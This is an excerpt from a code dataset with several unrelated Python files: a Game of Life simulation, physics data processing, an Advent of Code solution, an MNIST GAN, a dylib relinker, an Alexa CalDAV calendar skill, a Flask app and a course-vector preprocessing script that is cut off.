SETUP------->\nROWS = 200\nCOLS = 200\ntilewidth = 4\ntileheight = 4\nmargin = 0\nmygrid = np.zeros((ROWS,COLS))\nmygrid = np.pad(mygrid,1,constant_values=0) ##pads the array so that it can be shifted later\n\n\n#----WINDOW SETTINGS---->\nWIDTH = (COLS+2)*(tilewidth+margin)\nHEIGHT = (ROWS+2)*(tileheight+margin)\n\n\n#<----COLOURS---->\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\n\n#<----SETUP PYGAME WINDOW---->\npygame.init()\npygame.display.set_caption(\"Game of Life V3\")\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\nfps = 60\nrunning = False\n\n\n##<-------FUNCTIONS------->\ndef event_handler():\n global run\n global running\n global mygrid\n global changes\n global index\n\n if event.type == pygame.QUIT:\n run = False\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r: ## reset grid and display\n screen.fill(BLACK)\n mygrid = np.zeros((ROWS,COLS))\n mygrid = np.pad(mygrid,1,constant_values=0)\n\n elif event.key == pygame.K_q: ## create random grid and update display\n screen.fill(BLACK)\n mygrid = np.random.randint(2,size=(ROWS,COLS))\n mygrid = np.pad(mygrid,1,constant_values=0)\n changes=[]\n index=0\n full_update_display(mygrid)\n\n elif event.key == pygame.K_KP_PLUS: ## runs a single step in the simulation\n changes=[]\n index=0\n mygrid = update_mygrid(mygrid)\n\n else:\n running = not running ## starts/stops running program\n\n pressed = pygame.mouse.get_pressed()\n if pressed[0]:\n pos = pygame.mouse.get_pos()\n x, y = pos\n column = x // (tilewidth + margin)\n row = y // (tileheight + margin)\n mygrid[row,column] = 1\n cell = pygame.Rect([margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, tilewidth, tileheight])\n pygame.draw.rect(screen, WHITE, cell)\n pygame.display.update(cell)\n\n elif pressed[2]:\n pos = pygame.mouse.get_pos()\n x, y = pos\n column = x // (tilewidth + margin)\n row = y // (tileheight + margin)\n mygrid[row,column] = 0\n cell = pygame.Rect([margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, tilewidth, tileheight])\n pygame.draw.rect(screen, BLACK, cell)\n pygame.display.update(cell)\n\n\ndef get_shifted(grid):\n ulshift = np.roll(grid,(-1,-1),axis=(0,1))\n ushift = np.roll(grid,(-1,0),axis=(0,1))\n urshift = np.roll(grid,(-1,1),axis=(0,1))\n rshift = np.roll(grid,(0,1),axis=(0,1))\n drshift = np.roll(grid,(1,1),axis=(0,1))\n dshift = np.roll(grid,(1,0),axis=(0,1))\n dlshift = np.roll(grid,(1,-1),axis=(0,1))\n lshift = np.roll(grid,(0,-1),axis=(0,1))\n shifted_grids = np.array([ulshift,ushift,urshift,rshift,drshift,dshift,dlshift,lshift])\n return shifted_grids\n\n\ndef update_cell(state, neighbours):\n if state == 1: ## if cell is alive\n if neighbours == 2 or neighbours == 3:\n return 1\n else: ## if cell is dead\n if neighbours == 3:\n return 1\n return 0\nupdate_cell = np.frompyfunc(update_cell, 2, 1) ##converts function into a ufunc\n\n\ndef update_mygrid(grid):\n shifted_grids = get_shifted(grid)\n neighbour_grid = shifted_grids[:,1:-1,1:-1].sum(0).flatten() ##for each cell it gets the number of living neighbours this array is then flattened into a 1d array\n newgrid = grid[1:-1,1:-1].flatten() ##unpads array and flattens into a 1d array\n newgrid = update_cell(newgrid, neighbour_grid).reshape(ROWS, COLS)\n newgrid = np.pad(newgrid, 1, constant_values=0)\n update_display(grid.flatten(), newgrid.flatten())\n pygame.display.update()\n return newgrid\n\n\nindex = 0\nchanges = []\ndef update_display(grid, newgrid):\n global index\n global changes\n\n if newgrid != grid:\n if newgrid == 1:\n color = WHITE\n else:\n color = BLACK\n row = index//(COLS+2) ## this is the number of WHOLE columns that would fit aka row index\n column = index%(COLS+2) ## this is the remainder when you try to divide by column length aka column index\n cell = pygame.Rect([margin + (margin+tilewidth)*column, margin + (margin+tileheight)*row, tilewidth, tileheight])\n pygame.draw.rect(screen, color, cell)\n changes.append(cell)\n index +=1\nupdate_display = np.frompyfunc(update_display, 2, 0) ##converts function into a ufunc\n\ndef full_update_display(newgrid):\n for row in range(ROWS):\n for column in range(COLS):\n if newgrid[row][column] == 1:\n color = WHITE\n else:\n color = BLACK\n pygame.draw.rect(screen, color, [margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, tilewidth, tileheight])\n pygame.display.flip()\n\n#<----RUN PROGRAM IN PYGAME---->\nrun = True\nwhile run:\n clock.tick(fps)\n for event in pygame.event.get():\n event_handler()\n\n while running: ## running the actual simulation\n for event in pygame.event.get():\n event_handler()\n\n s=time.perf_counter()\n mygrid = update_mygrid(mygrid) ##updates grid and display once\n index=0 ##resets variables used to update grid\n changes=[]\n print(1/(time.perf_counter()-s))\n\n pygame.display.update()","sub_path":"game of life v2.py","file_name":"game of life v2.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"329967649","text":"#\n# PbPb_hadrons.py\n# Collective flows\n#\n# Created by Vladislav Lyalin on 6.04.16.\n#\n\n# datafile v2hadrons.txt is taken from Pi0 corr/Scripts/V2/PbPb\n# datafiles hM-N.txt is taken from https://inspirehep.net/record/1127497\n\n# TODO: make code run from any system\n\nimport pandas as pd\nimport numpy as np\nimport ROOT\nimport re\n\nproject_directory = '/Users/Vlad/Desktop/Collective flows'\nsupplementary_functions_directory = project_directory + '/Code'\n\nimport sys\n\nsys.path.insert(0, supplementary_functions_directory)\nimport supplementary_functions as supp\n\ndef process_data(save_data=True, print_graphs=False):\n process_V2_data(save_data=save_data, print_graphs=print_graphs)\n process_yields_data(save_data=save_data, print_graphs=print_graphs)\n\n\ndef process_V2_data(save_data=False, print_graphs=False):\n \"\"\"\n Devide Pb-Pb hadrons V2 file into 6 files with various centralities\n Save to 'Processed Data/Pb-Pb/Hadrons/V2/' as a pandas-friendly .csv\n If print_graphs save graphs as .png\n \"\"\"\n\n filepath = project_directory + '/Raw Data/Pb-Pb/Hadrons/V2/v2hadrons.txt'\n savepath = project_directory + '/Processed Data/Pb-Pb/Hadrons/V2/'\n name = 'Pb-Pb_Hadrons_V2_C%i'\n\n data = pd.read_table(filepath)\n\n # v2hadrons.txt headers:\n # range(0, 33)\n #\n # v2hadrons.txt structure:\n #\n # xv x_min x_max\n # yv_c0 syv1_c0 syv2_c0 stv1_c0 stv2_c0\n # yv_c1 syv1_c1 syv2_c1 stv1_c1 stv2_c1\n # yv_c2 syv1_c2 syv2_c2 stv1_c2 stv2_c2\n # yv_c3 syv1_c3 syv2_c3 stv1_c3 stv2_c3\n # yv_c4 syv1_c4 syv2_c4 stv1_c4 stv2_c4\n # yv_c5 syv1_c5 syv2_c5 stv1_c5 stv2_c5\n #\n # all that in one line\n #\n # c for centrality: 0=0-5%, 1=5-10%, 2=10-20%, 3=20-30%, 4=30-40%, 5=40-50%\n\n centralities = [0, 5, 10, 20, 30, 40]\n headers = ['pT', 'pT min', 'pT max', 'V2', 'stat +', 'stat -', 'sys +', 'sys -']\n x = data[[0, 1, 2]]\n x.columns = ['pT', 'pT min', 'pT max']\n\n for i in xrange(3, 29, 5):\n _name = name % centralities[0]\n del(centralities[0])\n y = data.iloc[:,i:i+5]\n y.columns = ['V2', 'stat +', 'stat -', 'sys +', 'sys -']\n one_data = pd.concat([x,y], axis=1)\n if save_data:\n one_data.to_csv(savepath + _name + '.csv', index=False)\n\n if print_graphs:\n graph = supp.get_TGraph_from_data(one_data, graph_name=re.sub('_', ' ', _name))\n canvas = ROOT.TCanvas()\n graph.Draw()\n canvas.SaveAs(savepath + _name + '.png')\n\n\ndef process_yields_data(save_data=False, print_graphs=False):\n \"\"\"\n Saves yields to 'Processed Data/Pb-Pb/Hadrons/Yields/' as a pandas-friendly .csv\n \"\"\"\n filepath = project_directory + '/Raw Data/Pb-Pb/Hadrons/Yields/'\n savepath = project_directory + '/Processed Data/Pb-Pb/Hadrons/Yields/'\n name = 'Pb-Pb_Hadrons_Yield_C%i'\n\n default_headers = ['pT', 'pT min', 'pT max', 'V2', 'stat +', 'stat -', 'sys +', 'sys -']\n\n centralities = [0, 5, 10, 20, 30, 40] #also yield data for 50, 60, 70\n filenames = ['h0-5', 'h5-10', 'h10-20', 'h20-30', 'h30-40']\n\n for centrality, filename in zip(centralities, filenames):\n _filename = filename + '.txt'\n _name = name % centrality\n strings = []\n is_comment = True\n with open(filepath + _filename, 'r') as f:\n for line in f:\n if is_comment:\n if 'x\\txlow\\txhigh\\ty\\tdy+\\tdy-\\tdy+\\tdy-' in line:\n is_comment = False\n elif line != '\\n' and line != '':\n strings.append(map(float, line.strip().split('\\t')))\n\n data = pd.DataFrame(strings, columns=default_headers)\n\n if save_data:\n data.to_csv(savepath + _name + '.csv', index=False)\n\n if print_graphs:\n graph = supp.get_TGraph_from_data(data, graph_name=re.sub('_', ' ', _name))\n canvas = ROOT.TCanvas()\n # log X-axis\n canvas.SetLogx()\n graph.Draw()\n canvas.SaveAs(savepath + _name + '.png')\n\n\ndef fit_data(print_graphs=False):\n \"\"\"\n Fit Pb-Pb hadrons V2 for various centralities and return TF1\n \"\"\"\n centralities = [0, 5, 10, 20, 30, 40]\n filepaths = project_directory + '/Processed data/Pb-Pb/Hadrons/V2/Pb-Pb_Hadrons_V2_C%i.csv'\n fit_function_string = '[0]*(1+[1]*x^1+[2]*x^2+[3]*x^3)/(1+[4]*x^1+[5]*x^2+[6]*x^3+[7]*x^4)'\n fit_function = ROOT.TF1('fit_function', fit_function_string, 0.2, 20)\n\n fit_functions = []\n\n for centrality in centralities:\n filepath = filepaths % centrality\n graph = supp.get_TGraph_from_filepath(filepath)\n\n # initial parameters for fit\n fit_function.SetParameters(0.001634, 109., -16.9, 1.894, 0.1106, -0.0433, 0.02272, 0)\n # fit_function.SetParLimits(7, -0.0001, 0.0001)\n\n graph.Fit(fit_function, 'r')\n graph.Draw('AP')\n\n if print_graphs:\n canvas = ROOT.TCanvas()\n ROOT.gStyle.SetOptFit(1)\n graph.SetTitle('Pb-Pb Hadrons V2 C%i' % centrality)\n graph.GetXaxis().SetTitle('p_{T} (GeV)')\n graph.GetYaxis().SetTitle('V2')\n graph.Draw()\n canvas.SaveAs(project_directory + '/Processed data/Pb-Pb/Hadrons/V2/Pb-Pb_Hadrons_V2_C%i_fit.png' % centrality)\n\n return fit_function\n # return graph\n","sub_path":"Older files/Code/Pb-Pb/PbPb_hadrons.py","file_name":"PbPb_hadrons.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"310670562","text":"with open(\"input\") as file:\n program = []\n for line in file:\n op, arg = line.split()\n program.append((op, int(arg)))\n\ndef execute(program):\n \"\"\"\n execute the given program.\n returns an (acc, reason) tuple. \n acc is the value of the accumulator.\n reason is either 'loop' or 'success' or 'out of bounds' depending on why the program ended.\n \"\"\"\n pc = 0\n acc = 0\n seen = set()\n while pc not in seen:\n seen.add(pc)\n if pc == len(program):\n return acc, \"success\"\n elif pc < 0 or pc > len(program):\n return acc, \"out of bounds\"\n op, arg = program[pc]\n if op == \"nop\":\n pass\n elif op == \"acc\":\n acc += arg\n elif op == \"jmp\":\n pc += arg - 1 #since we'll increment it after this\n pc += 1\n return acc, \"loop\"\n\n#part 1\nacc, _ = execute(program)\nprint(acc)\n\n#part 2\nfor idx, (op, arg) in enumerate(program):\n if op in (\"nop\", \"jmp\"):\n new_op = \"nop\" if op == \"jmp\" else \"jmp\"\n program[idx] = (new_op, arg)\n\n acc, reason = execute(program)\n if reason == \"success\":\n print(acc)\n break\n\n program[idx] = (op, arg)\nelse:\n print(\"No solution found.\")","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610596946","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\n# import logger\n\n\ndef to_np(x):\n return x.data.cpu().numpy()\n\n\ndef to_variable(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return autograd.Variable(x)\n\n\ndef denorm(x):\n out = (1 + x) / 2\n return out.clamp(0, 1)\n\n\ndef discriminator():\n D = nn.Sequential(\n nn.Linear(784, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 1),\n nn.Sigmoid()\n )\n return D\n\n\ndef generator():\n G = nn.Sequential(\n nn.Linear(64, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 784),\n nn.Tanh())\n return G\n\n\ndef train(config, dataloader, criterion, D=None, G=None, d_optimizer=None,\n g_optimizer=None, logger=None):\n for epoch in range(config.num_epochs):\n for i, (images, _) in enumerate(dataloader):\n batch_size = images.size(0)\n images = to_variable(images.view(batch_size, -1))\n\n # Train the discriminator and generator\n real_labels = to_variable(torch.ones(batch_size))\n fake_labels = to_variable(torch.zeros(batch_size))\n\n # Train D to recognize real images as real\n outputs = D(images)\n d_real_loss = criterion(outputs, real_labels)\n\n # Train D to recognize fake images as fake\n noise = to_variable(torch.randn(batch_size, 64))\n fake_images = G(noise)\n outputs = D(fake_images)\n d_fake_loss = criterion(outputs, fake_labels)\n\n # Backprop and optimize\n d_loss = d_real_loss + d_fake_loss\n D.zero_grad()\n d_loss.backward()\n d_optimizer.step()\n\n # Train G to generate real images\n noise = to_variable(torch.randn(batch_size, 64))\n fake_images = G(noise)\n outputs = D(fake_images)\n g_loss = criterion(outputs, real_labels)\n\n D.zero_grad()\n G.zero_grad()\n g_loss.backward()\n g_optimizer.step()\n\n # print training statistics\n if (i + 1) % 100 == 0:\n print('Epoch: [%d/%d], Step: [%d/%d], d_real_loss: %.3f, d_fake_loss: %.3f, g_loss: %.3f' % (\n epoch + 1, config.num_epochs, i + 1, len(dataloader), d_real_loss.data[0], d_fake_loss.data[0], g_loss.data[0]))\n\n\n '''\n # ======================== TensorBoard logging ============================= #\n # 1. Log the scalar values\n info = {\n 'd_real_loss': d_real_loss.data[0],\n 'd_fake_loss': d_fake_loss.data[0],\n 'g_loss': g_loss.data[0]\n }\n\n for tag, value in info.items():\n logger.scalar_summary(tag, value, i + 1)\n\n # 2. Log the values and gradients of the parameters (histogram)\n # skip for this GAN training\n\n # 3. Log the images\n\n info = {\n 'fake_images': to_np(fake_images.view(-1, 28, 28)[:10])\n }\n\n for tag, images in info.items():\n logger.image_summary(tag, images, i + 1)\n '''\n\n # save real images\n if (epoch + 1) == 1:\n images = images.view(images.size(0), 1, 28, 28)\n torchvision.utils.save_image(denorm(images.data), os.path.join(config.real_images_path, 'real_images.png'))\n\n # save sampled images\n fake_images = fake_images.view(fake_images.size(0), 1, 28, 28)\n torchvision.utils.save_image(denorm(fake_images.data), os.path.join(config.fake_images_path, 'fake_images-%d.png' % (epoch + 1)))\n\n # save model\n torch.save(D.state_dict(), os.path.join(config.model_path, 'discriminator.pkl'))\n torch.save(G.state_dict(), os.path.join(config.model_path, 'generator.pkl'))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--num_epochs', type=int, default=200)\n parser.add_argument('--lr', type=float, default=0.0003)\n parser.add_argument('--batch_size', type=int, default=100)\n parser.add_argument('--num_workers', type=int, default=2)\n\n parser.add_argument('--model_path', type=str, default='./models')\n parser.add_argument('--real_images_path', type=str, default='./data/fake_images')\n parser.add_argument('--fake_images_path', type=str, default='./data/real_images')\n\n config = parser.parse_args()\n\n transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.MNIST(root='./data', download=True, train=True, transform=transform)\n dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=config.batch_size, shuffle=True)\n\n criterion = nn.BCELoss()\n\n D = discriminator()\n G = generator()\n\n if torch.cuda.is_available():\n D.cuda()\n G.cuda()\n\n d_optimizer = optim.Adam(D.parameters(), lr=config.lr)\n g_optimizer = optim.Adam(G.parameters(), lr=config.lr)\n\n # logger = logger.Logger('./logs')\n\n train(config, dataloader, criterion, D, G, d_optimizer, g_optimizer, logger=logger)\n\n\n\n\n","sub_path":"GAN/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512490647","text":"#/bin/env python \n\nimport os\nfrom subprocess import check_output\n\nOTOOL = \"otool\"\nINT = \"install_name_tool\"\nBASE = \"@executable_path/../Frameworks/\"\n\n\nREPLACEMENTS = {\n 'libjson-c.2.dylib': 'libjson-c.dylib',\n 'libjson.0.dylib': 'libjson.dylib',\n 'libhidapi.0.dylib': 'libhidapi.dylib',\n 'libu2f-host.0.dylib': 'libu2f-host.dylib',\n 'libykpers-1.1.dylib': 'libykpers-1.dylib',\n 'libyubikey.0.dylib': 'libyubikey.dylib'\n}\n\n\ndef relink(dylib, local=[]):\n # Fix ID\n replacement = REPLACEMENTS.get(dylib, dylib)\n check_output([INT, '-id', BASE+replacement, dylib])\n\n # Relink local dylibs.\n out = check_output([OTOOL, '-L', dylib])\n for line in out.splitlines()[2:]:\n for l in local:\n l_rep = REPLACEMENTS.get(l, l)\n if l in line or l_rep in line:\n line = line.strip().split()[0]\n check_output([INT, '-change', line, BASE+l_rep, dylib])\n\n\ndef main():\n dylibs = [f for f in os.listdir('.') if f.endswith('.dylib')]\n hits = REPLACEMENTS.keys() + dylibs\n for lib in dylibs:\n print(lib)\n relink(lib, hits)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"resources/mac/relink.py","file_name":"relink.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"481078149","text":"import re\nimport pprint\nimport json\nfrom datetime import datetime\nfrom datetime import timedelta\nimport caldav\nimport urllib3\nfrom caldav.elements import dav, cdav\nfrom calendar import monthrange\nfrom ics import Calendar\nfrom flask import Flask\nfrom flask_ask import Ask, statement, request\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n# read configuration\nwith open('./config.json') as json_data_file:\n\tconfig = json.load(json_data_file)\n\n# open log files\n#f = open('./calexa.log', 'a+')\ndef log(msg):\n#\tglobal f\n#\tf.write(msg)\n#\tf.flush()\n\tprint(msg)\n\ndef connectCalendar():\n\tglobal config\n\n\tclient = caldav.DAVClient(config[\"url\"], username=config[\"username\"], password=config[\"password\"])\n\tprincipal = client.principal()\n\tcalendars = principal.calendars()\n\n\treturn sorted(calendars,key=lambda calendar: str(calendar.url))\n\n# split away TRIGGER and VALARM fields, since caldav library does not always parse them correctly\ndef filterEventTriggers(events):\n\tfor r in events:\n\t\tev = \"\";\n\t\tev_data = str(r._data).splitlines()\n\t\tfor line in ev_data:\n\t\t\tif not line.lstrip().startswith(\"TRIGGER\") and \":VALARM\" not in line:\n\t\t\t\tev += (line + '\\n')\n\t\tr._data = ev\n\n\treturn events\n\ndef getCalDavEvents(begin, end):\n\tcalendars = connectCalendar()\n\tspeech_text = \"\"\n\n\tif (len(calendars) <= 0):\n\t\tspeech_text = \" unfortunately I could not connect to your calendar\\n\"\n\t\tlog(\"ERROR: \" + speech_text)\n\telse:\n\t\teventList = []\n\t\tflatten = lambda l: [item for sublist in l for item in sublist]\n\n\t\tlog(\" found calendars: \" + str(len(calendars)) + \"\\n\")\n\t\ti = 0\n\t\tfor calendar in calendars:\n\t\t\tlog(\"\t[\" + str(i + 1) + \"]: \" + str(calendar))\n\t\t\tresults = calendar.date_search(begin, end)\n\n\t\t\tlog(\" -> \" + str(len(results)) + \" events \\n\")\n\t\t\tif len(results) > 0:\n\t\t\t\tresults\t= filterEventTriggers(results)\n\t\t\t\teventList = eventList + flatten([Calendar(event._data).events for event in results])\n\t\t\ti = i + 1\n\n\t\tif (len(eventList) <= 0):\n\t\t\tspeech_text = \"There are no events\"\n\t\telse:\n\t\t\tlog(\" returning \" + str(len(eventList)) + \" event(s)\\n\")\n\t\t\tsortedEventList = sorted(eventList,key=lambda icsEvent: icsEvent.begin)\n\n#\t\t\tpp = pprint.PrettyPrinter(indent=4)\n#\t\t\tpp.pprint(sortedEventList)\n\n\t\t\tspeech_text += '\\n'\n\t\t\tspeech_text += ' The following events are on your calendar:\\n'\n\t\t\tfor icsEvent in sortedEventList:\n\t\t\t\tspeech_text += ' ' + icsEvent.begin.humanize(locale='en') + ' is ' + getEventName(icsEvent) + '\\n'\n\t\t\tspeech_text += ''\n\n\treturn speech_text\n\n#@ask.intent('GetTodayEventsIntent')\n#def getTodayEvents():\n#\tspeech_text = getCalDavEvents(datetime.now(), datetime.now() + timedelta(days=1))\n#\tprint(speech_text)\n#\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\n@ask.intent('GetEventsIntent', convert={ 'date': 'date', 'enddate': 'date' })\ndef getDateEvents(date, enddate):\n\tlog(\"Reading events!\\n\")\n\tlog(\" date (from user): \" + str(date) + \" \" + str(type(date)) + \"\\n\")\n\tlog(\" enddate (from user): \" + str(enddate) + \" \" + str(type(enddate)) + \"\\n\")\n\n\t# in case that default \"enddate\" does not comply to \"date\",\n\t# the enddate is set to end of the day of \"date\"\n\tif date==None:\n\t\tdate = datetime.now()\n\n\tif enddate==None or date>=enddate:\n\t\tenddate = getEndDate(date, request.intent.slots.date.value)\n\n\tlog(\" date: \" + str(date) + \"\\n\")\n\tlog(\" endDate: \" + str(enddate) + \"\\n\")\n\n\tspeech_text = getCalDavEvents(date, enddate)\n\tlog(\" text: \" + speech_text + \"\\n\")\n\n\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\ndef getEndDate(date, orig_date):\n\tlog(\" orig_date: \" + str(orig_date) + \" \" + str(type(orig_date)) + \"\\n\")\n\torig_date = re.sub('X$', '0', orig_date)\n\tif re.match('^\\d{4}-W\\d{2}$', orig_date):\n\t\t# this week\n\t\tendDate = date + timedelta(days=7)\n\telif re.match('\\d{4}-W\\d{2}-WE$', orig_date):\n\t\t# this weekend\n\t\tendDate = date + timedelta(days=2)\n\telif re.match('^\\d{4}-\\d{2}$', orig_date):\n\t\t# this month\n\t\tlast_day = monthRange(date.year, date.month)\n\t\tendDate = dateTime.date(date.year, date.month, last_day)\n\telif re.match('^\\d{4}$', orig_date):\n\t\t# this/next year\n\t\tendDate = dateTime.date(date.year, 12, 31)\n\telse:\n\t\tendDate = datetime(date.year, date.month, date.day + 1)\n\n\treturn endDate\n\ndef getEventName(event):\n\t# see: https://stackoverflow.com/que\tstions/40135637/error-unable-to-parse-the-provided-ssml-the-provided-text-is-not-valid-ssml\n\tname = event.name\n\tname = name.replace('&', ' and ')\n\tname = name.replace('*', '')\n\treturn name\n\n# We do have a minor problem here. There is no timezone information in the date/time objects...\n# ... we assume the server's timezone, but it could be that this is wrong. So if created events are off by some hour(s)\n# this is the reason. If someone wants to provide a simple PR then this would be great :-)\n@ask.intent('SetEventIntent', convert={'date': 'date', 'time':'time', 'duration' : 'timedelta'})\ndef setEvent(date, time, duration, eventtype, location):\n\tlog(\"Creating event!\\n\");\n\tlog(\" date (from user): \" + str(date) + \"\\n\")\n\tlog(\" time (from user): \" + str(time) + \"\\n\")\n\tlog(\" duration (from user): \" + str(duration) + \"\\n\")\n\tlog(\" eventtype (from user): \" + str(eventtype) + \"\\n\")\n\tlog(\" location (from user): \" + str(location) + \"\\n\")\n\tspeech_text = \"Date could not be understood!\"\n\n\tif eventtype==None:\n\t\teventtype='Meeting'\n\n\tif date==None:\n\t\tdate = datetime.today()\n\n\tif duration==None:\n\t\tduration = timedelta(hours=1)\n\n\td = datetime.combine(date,time)\n\n\tcreationDate = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\n\tstartDate = d.strftime(\"%Y%m%dT%H%M%S\")\n\tendDate = (d + duration).strftime(\"%Y%m%dT%H%M%S\")\n\n\tlog(\" startDate: \" + str(startDate) + \"\\n\")\n\tlog(\" endDate: \" + str(endDate) + \"\\n\")\n\n\tvcal = \"BEGIN:VCALENDAR\"+\"\\n\"\n\tvcal += \"VERSION:2.0\"+\"\\n\"\n\tvcal += \"PRODID:-//Example Corp.//CalDAV Client//EN\"+\"\\n\"\n\tvcal += \"BEGIN:VEVENT\"+\"\\n\"\n\tvcal += \"UID:1234567890\"+\"\\n\"\n\tvcal += \"DTSTAMP:\" + creationDate +\"\\n\"\n\tvcal += \"DTSTART:\" + startDate +\"\\n\"\n\tvcal += \"DTEND:\" + endDate +\"\\n\"\n\tvcal += \"SUMMARY:\" + eventtype + \"\\n\"\n\tvcal += \"END:VEVENT\"+\"\\n\"\n\tvcal += \"END:VCALENDAR\"\n\n\tlog(\" entry: \" + vcal + \"\\n\")\n\n\tcalendars = connectCalendar()\n\tif (len(calendars) <= 0):\n\t\tspeech_text = \"Unfortunately I could not connect to your calendar\"\n\t\tlog(\"ERROR: \" + speech_text + \"\\n\")\n\telse:\n\t\t# This could be sooo much easier if we had something like \"if (calendar.isReadOnly())\"\n\t\ti = 0\n\t\tlog(\" found calendar: #\" + str(len(calendars)) + \"\\n\")\n\t\tfor calendar in calendars:\n\t\t\tlog(\" [\" + str(i + 1) + \"]: \" + str(calendar) + \"\\n\")\n\t\t\ttry:\n\t\t\t\tevent = calendar.add_event(vcal)\n\t\t\t\tspeech_text = \"Event has been added!\"\n\n\t\t\t\t# Everything worked out well and event has been entered into one calendar -> we do not have to try other calendars and therefore skip the loop\n\t\t\t\tbreak\n\t\t\texcept Exception as te:\n\t\t\t\tif (i >= len(calendars)):\n\t\t\t\t\tspeech_text = \"All of your calendars are read-only\"\n\t\t\t\t\tlog(\"ERROR: \" + speech_text + \"\\n\")\n\t\t\t\t\tlog(\"ERROR: \" + str(te) + \"\\n\")\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tlog(\" Couldn't write to calendar: \" + str(calendar) + \". Try the next calendar...\\n\")\n\t\t\t\t\t# Try using the next calendar... we will fail when the event could not be added to any calendar\n\t\t\t\t\ti = i + 1\n\n\tlog(\" text: \" + speech_text + \"\\n\")\n\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\n#print getTodayEvents()\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\", port=config[\"calexaPort\"])\n","sub_path":"calexa-eng.py","file_name":"calexa-eng.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581436067","text":"from flask import Flask, render_template, request\nfrom MathematicalProgramming.core.model import *\nfrom MathematicalProgramming.scripts import *\nimport json\n\napp = Flask(__name__)\n\n\nclass TEX():\n def __init__(self):\n self.TeX = ''\n\n\ntex = TEX()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef MathematicalProgramming():\n\n if request.method == 'POST':\n file = request.files['model']\n model_dict = json.load(file)\n if model_dict['type'] == 'SP':\n model = SPModel(model_dict['f'], model_dict['extremum'])\n n = len(model_dict.keys()) - 6\n for i in range(n):\n condition = model_dict['condition' + str(i)]\n model.add_condition(condition['left'], condition['sign'],\n condition['right'])\n\n tex.TeX = SPscript(model, model_dict['a'], model_dict['b'],\n model_dict['count'])\n return render_template('index.html', TeX=tex.TeX.replace('
', ''))\n\n\n@app.route('/latex')\ndef latex():\n return tex.TeX\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"mpapp.py","file_name":"mpapp.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"637148588","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nimport json\n\nOUT_DIR = os.environ[\"outDir\"]\nCOURSE_VECTOR_DIR = OUT_DIR\nCOURSE_INFO_DIR = '../shared/course_api/outputs'\nINTERMEDIATE_DATA_DIR = './data'\nvectors_path = COURSE_VECTOR_DIR + '/course2vec.npy'\nvec2course_path = COURSE_VECTOR_DIR + '/idx2course.json'\ncourse_info_path = COURSE_INFO_DIR + '/course_description_init.tsv'\n\nprint('[INFO] Begin data preprocessing stage...')\nprint('[INFO] Reading in course vectors...')\n\nvectors = np.load(vectors_path)\n\nwith open(vec2course_path) as json_data:\n vec2course_map = json.load(json_data)\n\nvect_dict = {}\nfor vector_id in vec2course_map.keys():\n vect_dict[int(vector_id)] = vectors[int(vector_id)-1]\n\nvect_df = pd.DataFrame(vect_dict).T\nvect_df.index.name = 'vector_id'\nvect_df.reset_index(inplace = True)\n\ncourse_identifier_list = [vec2course_map[str(vec_id)] for vec_id in vect_df['vector_id']]\nvect_df.insert(loc = 1, column = 'vector_course_identifier', value = course_identifier_list)\n\nprint('[INFO] Transforming vectors done.')\n\nprint('[INFO] Reading in course descriptions...')\n\ndescript_df = pd.read_csv(course_info_path, sep = '\\t', )[['abbr_cid', 'course_num', 'course_subject', 'course_description', 'course_title']]\n\ndescript_df['course_name'] = descript_df['abbr_cid'].str.replace('_', ' ').str.lower().str.capitalize()\ndescript_df['course_alternative_names'] = descript_df['course_subject'] + ' ' + descript_df['course_num']\ndescript_df['course_alternative_names'] = descript_df['course_alternative_names'] + ' ' + descript_df['abbr_cid'].str.replace('_', '')\n# add custom abbreviations here\ndescript_df['vector_course_identifier'] = descript_df['course_subject'] + '_' + descript_df['course_num']\ndescript_df.drop(['course_num', 'abbr_cid'], axis = 